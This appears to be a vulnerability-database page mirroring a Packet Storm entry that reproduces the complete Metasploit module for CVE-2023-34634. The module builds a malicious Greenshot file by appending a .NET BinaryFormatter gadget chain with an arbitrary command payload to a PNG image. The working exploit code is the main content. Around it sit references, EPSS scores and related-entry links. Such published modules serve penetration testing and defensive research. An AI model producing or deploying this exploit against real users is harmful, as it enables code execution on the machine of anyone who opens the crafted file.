Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBwatters-r7, p4r4bellum, metasploit.comPACKETSTORM:174222
HistoryAug 17, 2023 - 12:00 a.m.

Greenshot 1.3.274 Deserialization / Command Execution

2023-08-1700:00:00
bwatters-r7, p4r4bellum, metasploit.com
packetstormsecurity.com
231
metasploit
exploit
.net
deserialization
command execution
greenshot
cve-2023-34634
edb-51633
windows

EPSS

0.923

Percentile

99.0%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Post::File  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',  
'Description' => %q{  
There exists a .NET deserialization vulnerability in Greenshot version 1.3.274  
and below. The deserialization allows the execution of commands when a user opens  
a Greenshot file. The commands execute under the same permissions as the Greenshot  
service. Typically, is the logged in user.  
},  
'DisclosureDate' => '2023-07-26',  
'Author' => [  
'p4r4bellum', # Discovery  
'bwatters-r7', # msf exploit  
],  
'References' => [  
['CVE', '2023-34634'],  
['EDB', '51633']  
],  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => ARCH_CMD,  
'Targets' => [  
[ 'Windows', {} ],  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]  
}  
)  
)  
  
register_options([  
OptPath.new('PNG_FILE', [false, 'PNG file to use'])  
])  
end  
  
def exploit  
if datastore['PNG_FILE'].blank?  
image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')  
else  
image_file = datastore['PNG_FILE']  
end  
  
datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?  
if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'  
datastore['FILENAME'] << '.greenshot'  
end  
cmd = payload.encoded  
  
image_data = File.binread(image_file)  
  
deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(  
cmd,  
gadget_chain: :WindowsIdentity,  
formatter: :BinaryFormatter  
)  
  
payload_length = deserialize_cmd.length  
outfile = image_data  
outfile << deserialize_cmd  
outfile << [payload_length].pack('Q')  
outfile << 'Greenshot01.02'  
file_create(outfile)  
end  
end  
`

Related

zdt 2
prion 1
osv 1
metasploit 1
nvd 1
packetstorm 1
cvelist 1
cve 1
exploitdb 1
rapid7blog 1
zdt
zdt
Greenshot 1.3.274 Deserialization / Command Execution Exploit
2023-08-17 00:00:00
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution Vulnerability
2023-07-28 00:00:00
prion
prion
Design/Logic Flaw
2023-08-01 14:15:00
osv
osv
CVE-2023-34634
2023-08-01 14:15:10
metasploit
metasploit
Greenshot .NET Deserialization Fileformat Exploit
2023-08-03 15:58:07
nvd
nvd
CVE-2023-34634
2023-08-01 14:15:10
packetstorm
packetstorm
GreenShot 1.2.10 Arbitrary Code Execution
2023-07-31 00:00:00
cvelist
cvelist
CVE-2023-34634
2023-08-01 00:00:00
cve
cve
CVE-2023-34634
2023-08-01 14:15:10
exploitdb
exploitdb
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
2023-07-28 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-08-18 17:22:46

EPSS

0.923

Percentile

99.0%

JSON
Related for PACKETSTORM:174222
zdt2prion1osv1metasploit1nvd1packetstorm1cvelist1cve1exploitdb1rapid7blog1